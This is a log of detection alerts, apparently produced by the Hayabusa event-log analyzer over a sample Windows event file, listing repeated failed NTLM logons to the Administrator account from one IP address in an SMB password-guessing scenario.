2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3IQkVcY5iMTxCRN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v44Kp3lpGKb6Xd4j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1skdEmGlXbzUWk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feaA6lAxWjapFbAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJZjTqY5innWcvSZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymXIp0KTw0vIbB0N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpPJEcLv7BoZaQwT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cz14Cv861RhFh0Pa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H8BklDHdS0cdcbGu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0m5Mznl2khRMj31V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ha6TuN7C8V0roSAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9oBW0yE5a9zSkpIH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n54EaKOUQIX9geqx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m6WCg3o4oatO42wW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KfCwo8ZUWiBqI8zC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8potisENMIsbNxcd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgagMNj95dkg9uQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1EVsGLFugwePvgR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q00SeueJQAiBGpe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWzSR1cJ2XJNirSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39MY5ZvRJSHVkZZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WyOdltctwdHNkH6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUcWk0xJn9zVMZSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2sauqNlJi3y0ZBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkih5QcLlcjw9gjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3KlUJslcpS9jhLY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: riuVWV1Ugr9c22hR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OSj1I0sXkPf96OL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsOJDxDiZSjoBj6F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uH0bQ9zEi1xcfHn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3AfNT0p4JC1VEfDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7T8R8U1WVHZQrYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kamexpa7isWT8gLC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8CyHFKVcdTo0Upx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U30aMcZuBD08GWK1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4mihftSCNCYdlBny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K2wa0xwK6tnurGJQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0V3TbNrKEnrDcEYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T73JW9JURm8Br6MA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OAleyg3h8aMvVVJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LQllnWZFUIWa6rw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlwPxSGUmvYH0rpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrI56o5TyeO48rQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CKRMn75tv5Yi5rYK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MbJvec7rVisJ6WCC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xoubp5WTPqblBaps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBczkR92cKY41icQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfUx3OizEb1LiOzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRaSOLOWhBEr0qkz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YnlI8Zh4td5m1fpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wXUDXDa4wi3HivKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TT7iOtVMFcEysCcI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1NJpI7KC3gj99aWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H39cv9JEuLEjlp93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4p9h1cjLeUzppSZb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0fOpi4vr55QmO6x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GiKI4V6kpkY5zc9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dLmu4n9qZdf3Q5zo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 87iJdX2E0ZJintvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxc4iIHP0kdqQNiG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJIWekwBwcIUWjD1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GdnvboiIDzXTZ8MR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGMPHNpljTlMYeet | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWo4uVFtAbe4IjKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YAPdDqbMY4rYiuZ3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ai2WCQ3MkWwSeOy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ey1wbsD7w3fs02xP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sVGzidwZICNfLizg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zjGPMJ6RBw48Ejx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MydK8AjPvyyckCEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fqkCliAQMiFffQU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITkku4kN4csBFyUB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g9kMkSFhKrT2Py | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1xKLdwujTmLEc9ts | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
